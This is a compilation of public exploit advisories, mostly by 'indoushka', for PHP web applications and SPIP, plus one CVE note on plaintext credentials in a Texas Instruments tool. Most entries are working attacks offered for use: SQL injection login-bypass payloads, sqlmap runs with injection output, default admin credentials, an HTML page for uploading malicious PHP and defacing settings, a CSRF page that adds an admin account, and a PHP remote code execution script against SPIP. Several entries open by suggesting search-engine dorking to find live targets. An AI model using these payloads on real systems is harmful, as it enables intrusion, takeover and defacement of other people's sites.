<pre><code>=============================================================================================================================================<br />| # Title : Supply Chain Management v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Supply_Chain_Management_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/scm-master/admin/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Student Result Management System v2.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Student-Result-Management-System-Using-PHP-V2.0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /edit-class.php?classid=1 <br /><br />[+] http://127.0.0.1/srms/edit-class.php?classid=1<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Student Record System v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/09/Student_Record_System_In_PHP_With_Source_Code.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/Student-Information-system/my-profile.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Student Attendance Management System 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] This HTML page is designed to remotely upload malicious PHP files directly.<br /> <br />[+] Line 84: set URL of target.<br /><br />[+] The path to upload the files : http://127.0.0.1/student_attendance/assets/uploads/<br /><br />[+] Save Code as html :<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Manage Settings</title><br /> <!-- Add your CSS links here --><br /> <style><br /> img#cimg {<br /> max-height: 10vh;<br /> max-width: 6vw;<br /> }<br /> </style><br /></head><br /><body><br /><br /><div class="card col-lg-12"><br /> <div class="card-body"><br /> <form action="" id="manage-settings"><br /> <div class="form-group"><br /> <label for="name" class="control-label">System Name</label><br /> <input type="text" class="form-control" id="name" name="name" value="Hacked BY indoushka" required><br /> </div><br /> <div class="form-group"><br /> <label for="email" class="control-label">Email</label><br /> <input type="email" class="form-control" id="email" name="email" value="indoushka4ever@gmail.com" required><br /> </div><br /> <div class="form-group"><br /> <label for="contact" class="control-label">Contact</label><br 
/> <input type="text" class="form-control" id="contact" name="contact" value="+213771818860" required><br /> </div><br /> <div class="form-group"><br /> <label for="about" class="control-label">About Content</label><br /> <textarea name="about" id="about" class="text-jqte" rows="5"><p style="text-align: center; background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-weight: 400; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p></p></textarea><br /> </div><br /> <div class="form-group"><br /> <label for="" class="control-label">Image</label><br /> <input type="file" class="form-control" name="img" id="img" onchange="displayImg(this)"><br /> </div><br /> <div class="form-group"><br /> <img src="assets/uploads/1603344720_1602738120_pngtree-purple-hd-business-banner-image_5493.jpg" alt="" id="cimg"><br /> </div><br /> <center><br /> <button type="submit" class="btn btn-info btn-primary btn-block col-md-2">Save</button><br /> </center><br /> </form><br /> </div><br /></div><br /><br /><script><br /> function displayImg(input) {<br /> if (input.files && input.files[0]) {<br /> var reader = new FileReader();<br /> reader.onload = function (e) {<br /> 
document.getElementById('cimg').src = e.target.result;<br /> }<br /> reader.readAsDataURL(input.files[0]);<br /> }<br /> }<br /><br /> function start_load() {<br /> // Implement your loading functionality here<br /> console.log("Loading started...");<br /> }<br /><br /> function end_load() {<br /> // Implement your end loading functionality here<br /> console.log("Loading ended...");<br /> }<br /><br /> function alert_toast(message, type) {<br /> // Implement your alert/toast notification here<br /> console.log(`${type}: ${message}`);<br /> }<br /><br /> document.getElementById('manage-settings').addEventListener('submit', function(e) {<br /> e.preventDefault(); // Prevent the default form submission<br /><br /> start_load(); // Start loading<br /><br /> var form = e.target;<br /> var formData = new FormData(form);<br /><br /> fetch('http://127.0.0.1/student_attendance/ajax.php?action=save_settings', {<br /> method: 'POST',<br /> body: formData<br /> })<br /> .then(response => response.text())<br /> .then(resp => {<br /> if (resp == 1) {<br /> alert_toast('Data successfully saved.', 'success');<br /> setTimeout(function() {<br /> location.reload(); // Reload the page after saving<br /> }, 1000);<br /> } else {<br /> // Handle error case if needed<br /> console.log('Error:', resp);<br /> }<br /> end_load(); // End loading<br /> })<br /> .catch(error => {<br /> console.error('Error:', error);<br /> end_load(); // End loading<br /> });<br /> });<br /></script><br /><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online course registartion 1.0 Blind SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2018/05/Online-course-registartion-Using-PHP.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Payload : news-details.php?nid=if <====== inject here<br /><br />[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1//onlinecourse/news-details.php?nid=if --dbs<br /><br />---<br />Parameter: nid (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: nid=if' AND (SELECT 2934 FROM (SELECT(SLEEP(5)))FpMu) AND 'XUff'='XUff<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 4 columns<br /> Payload: nid=if' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178787a71,0x41555a676d41466755754547656455487a544c50476163444b6d6a684b744d506c6c4e4b4e654550,0x7178766271)-- -<br />---<br />[14:13:02] [INFO] the back-end DBMS is MySQL<br />web application technology: PHP, Apache 2.4.58, PHP 8.0.30<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />[14:13:02] [INFO] fetching database names<br />available databases [1]:<br />[*] onlinecourse<br /><br /> <br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>Insufficiently Protected Credentials in Texas Instruments Fusion Digital Power Designer v.7.10.1<br /><br /><br /><br />Credit: Gionathan Armando Reale<br /><br /><br />//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /># Product: Fusion Digital Power Designer - Version 7.10.1<br /># Vendor: Texas Instruments<br /># CVE ID: CVE-2024-41629<br /># Vulnerability Title: Insufficiently Protected Credentials<br /># Severity: Medium<br /># Author(s): Gionathan Armando Reale<br /># Date: 2024-08-15<br />#<br />#############################################################<br />Introduction:<br />An issue in Texas Instruments Fusion Digital Power Designer v.7.10.1 allows a local attacker to obtain sensitive information via the plaintext storage of credentials.<br /><br />Vulnerability PoC:<br /><br />1. Create a connection within the application that requires credentials.<br />2. Access the file "C:/Program Files (x86)/Texas Instruments/Fusion Digial Power Designer/data/prefs-shared.xml"<br />3. Notice the credentials stored as plaintext.<br /><br /><br /><br /><br />/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Taskhub v2.8.8 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 12345678<br /><br />[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Webpay E-Commerce v1.0 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] use payload : catproduct.php?catpro=6<br /><br />[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs<br /><br />[+] Parameter: catpro (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: catpro=6' AND 5853=5853-- KEle<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 15 columns<br /> Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP 4.2.9 PHP Code execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Line 49 : Set your target.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br /><br />class IndoushkaExploit {<br /> private $targetUrl;<br /> private $payload;<br /><br /> public function __construct($targetUrl, $payload) {<br /> $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';<br /> $this->payload = $this->generatePayload($payload);<br /> }<br /><br /> private function generatePayload($payload) {<br /> // Generate the payload, embedding the command to execute<br /> return "[<img" . rand(10000000, 99999999) . 
">->URL`<?php {$payload} ?>`]";<br /> }<br /><br /> public function exploit() {<br /> // Prepare the POST data that will be sent to the target<br /> $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);<br /><br /> // Initialize the HTTP request using cURL<br /> $ch = curl_init($this->targetUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /><br /> // Add custom headers to bypass blocking<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: application/x-www-form-urlencoded',<br /> 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'<br /> ]);<br /><br /> // Execute the request<br /> $response = curl_exec($ch);<br /><br /> // Check for cURL errors<br /> if (curl_errno($ch)) {<br /> echo "cURL Error: " . curl_error($ch) . "\n";<br /> } else {<br /> echo "Exploit Sent! Response:\n";<br /> echo $response;<br /> }<br /><br /> curl_close($ch);<br /> }<br />}<br /><br />// Usage example<br />$targetUrl = 'https://example/spip/'; // Replace this with the real address<br />$payload = 'system("pwd");'; // PHP commands you want to execute<br /><br />$exploit = new IndoushkaExploit($targetUrl, $payload);<br />$exploit->exploit();<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Traffic Offense 1.0 CSRF Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] This HTML page is designed to create a file and inject PHP code.<br /><br />[+] save payload as poc.html <br /><br />[+] line 6, set your target.<br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/traffic_offense\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> 
xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>